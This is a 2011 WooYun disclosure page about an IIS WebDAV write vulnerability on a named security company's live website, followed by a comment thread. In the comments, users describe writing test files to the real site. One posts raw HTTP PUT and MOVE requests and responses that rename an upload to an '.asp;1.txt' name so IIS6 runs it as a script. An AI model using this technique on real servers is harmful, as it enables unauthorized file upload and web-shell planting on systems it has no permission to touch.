当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-02238

漏洞标题:瑞达信息安全产业股份有限公司IIS写入漏洞

相关厂商:瑞达信息安全产业股份有限公司

漏洞作者: 鬼色[N.S.T]

提交时间:2011-06-11 16:43

修复时间:2011-06-11 19:12

公开时间:2011-06-11 19:12

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2011-06-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-06-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

瑞达信息安全产业股份有限公司IIS写入漏洞,webdav

详细说明:

瑞达信息安全产业股份有限公司IIS写入漏洞,测试:http://www.jetsec.com.cn/guise.txt

漏洞证明:

瑞达信息安全产业股份有限公司IIS写入漏洞,测试:http://www.jetsec.com.cn/guise.txt

修复方案:

瑞达信息安全产业股份有限公司IIS写入漏洞,测试:http://www.jetsec.com.cn/guise.txt
ngsst

版权声明:转载请注明来源 鬼色[N.S.T]@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:5 (WooYun评价)

漏洞评价:

评论

  1. 2011-06-11 19:23 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    写不成功啊 测试了 你用的什么方法

  2. 2011-06-11 20:08 | Joker ( 实习白帽子 | Rank:44 漏洞数:6 | while(age++) { make(rmb); if (outOf(...)

    能写啊,直接用个iiswrite就写上去了:http://www.jetsec.com.cn/test.txt

  3. 2011-06-11 20:57 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    求工具

  4. 2011-06-11 21:48 | Joker ( 实习白帽子 | Rank:44 漏洞数:6 | while(age++) { make(rmb); if (outOf(...)

    直接搜索iiswrite应该就有下载吧,这个东西还是蛮好找的。

  5. 2011-06-12 00:26 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    PUT /a.txt HTTP/1.0Content-Length: 5aaaaaHTTP/1.1 201 CreatedConnection: closeDate: Sat, 11 Jun 2011 16:07:15 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETLocation: http://200.200.200.8/a.txtContent-Length: 0Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH,SEARCH, LOCK, UNLOCKMOVE /a.txt HTTP/1.0Destination: /c.aspHTTP/1.1 207 Multi-StatusConnection: closeDate: Sat, 11 Jun 2011 16:24:59 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETLocation: http://200.200.200.8/c.aspContent-Type: text/xmlContent-Length: 178<?xml version="1.0"?><a:multistatus xmlns:a="DAV:"><a:response><a:href>http://200.200.200.8/c.asp</a:href><a:status>HTTP/1.1 403 Forbidden</a:status></a:response></a:multistatus>发送 44, r接受 396: 无sock

  6. 2011-06-12 00:27 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    MOVE /a.txt HTTP/1.0Destination: /b.asp;1.txtHTTP/1.1 201 CreatedConnection: closeDate: Sat, 11 Jun 2011 16:23:14 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETLocation: http://200.200.200.8/b.asp;1.txtContent-Type: text/xmlContent-Length: 0

  7. 2011-06-12 00:32 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    http://www.jetsec.com.cn/d.asp;1.txt 微软是傻逼 鉴定完毕!

  8. 2012-05-23 09:19 | possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)

    @xsser 你成功了 直接put /d.asp;1.txt 我咋就返回404 (本地搭建的)

  9. 2013-06-27 18:37 | if、so 认证白帽子 ( 核心白帽子 | Rank:1008 漏洞数:91 | 梦想还是要有的,万一实现了呢?)

    @xsser 这都能加精?

  10. 2013-06-27 18:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @if、so 应该算是第一个在乌云提出这个问题的了

  11. 2013-07-11 12:57 | 鬼色[N.S.T] ( 普通白帽子 | Rank:130 漏洞数:18 | 雷州半岛)

    @xsser 我创建了一个乌云团队,团队已经存在,但怎么加进去呢? 看不到。